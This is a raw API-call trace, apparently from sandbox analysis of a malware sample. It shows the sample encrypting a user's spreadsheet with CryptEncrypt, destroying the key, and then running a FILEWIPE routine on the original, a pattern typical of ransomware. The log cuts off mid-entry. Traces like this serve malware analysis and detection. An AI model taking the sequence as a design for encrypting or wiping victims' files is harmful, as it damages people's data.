[0169.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.074] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0169.074] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.074] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.074] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0169.074] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.074] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0169.075] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0169.075] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0169.075] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.075] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.077] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x138f3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x13900) returned 1 [0169.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.077] CharLowerBuffW (in: lpsz="byte[80129]", cchLength=0xb | out: lpsz="byte[80129]") returned 0xb [0169.077] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.078] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.078] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.078] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.078] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0fc88*, pdwDataLen=0x87e820*=0x138f3, dwBufLen=0x13900 | out: pbData=0xa0fc88*, pdwDataLen=0x87e820*=0x13900) returned 1 [0169.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.080] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0169.080] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0169.080] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0169.080] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0169.080] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.080] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0169.080] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.080] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.086] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.086] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.086] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.091] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0169.091] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0169.091] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.091] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0169.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.091] CryptDestroyKey (hKey=0x90af18) returned 1 [0169.094] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0169.094] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0169.094] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0169.094] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0169.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0169.094] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0169.112] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0169.112] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0169.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.113] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0169.113] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0169.113] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0169.113] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0169.113] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0169.113] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.113] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0169.113] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0169.113] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.113] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.113] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.113] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0169.113] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.113] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.113] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0169.113] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0169.113] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0169.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.114] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0169.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.114] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0169.114] FreeLibrary (hLibModule=0x74f20000) returned 1 [0169.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.114] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.115] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.116] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.120] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.120] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0169.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862f1b80, ftCreationTime.dwHighDateTime=0x1d57779, ftLastAccessTime.dwLowDateTime=0x8cd8dec0, ftLastAccessTime.dwHighDateTime=0x1d57a90, ftLastWriteTime.dwLowDateTime=0x8cd8dec0, ftLastWriteTime.dwHighDateTime=0x1d57a90, nFileSizeHigh=0x0, nFileSizeLow=0x138f3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="F8kGUIlkgYER.xlsx", cAlternateFileName="F8KGUI~1.XLS")) returned 0x90ae18 [0169.121] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0169.121] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.121] CharLowerBuffW (in: lpsz="byte[80115]", cchLength=0xb | out: lpsz="byte[80115]") returned 0xb [0169.122] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.122] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0169.122] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.122] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0169.122] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0169.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0169.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0169.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0169.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2898 [0169.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.123] FreeLibrary (hLibModule=0x75c90000) returned 1 [0169.123] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0169.123] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0169.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0169.123] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0169.123] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0169.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0169.124] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.124] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.124] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.124] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.124] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 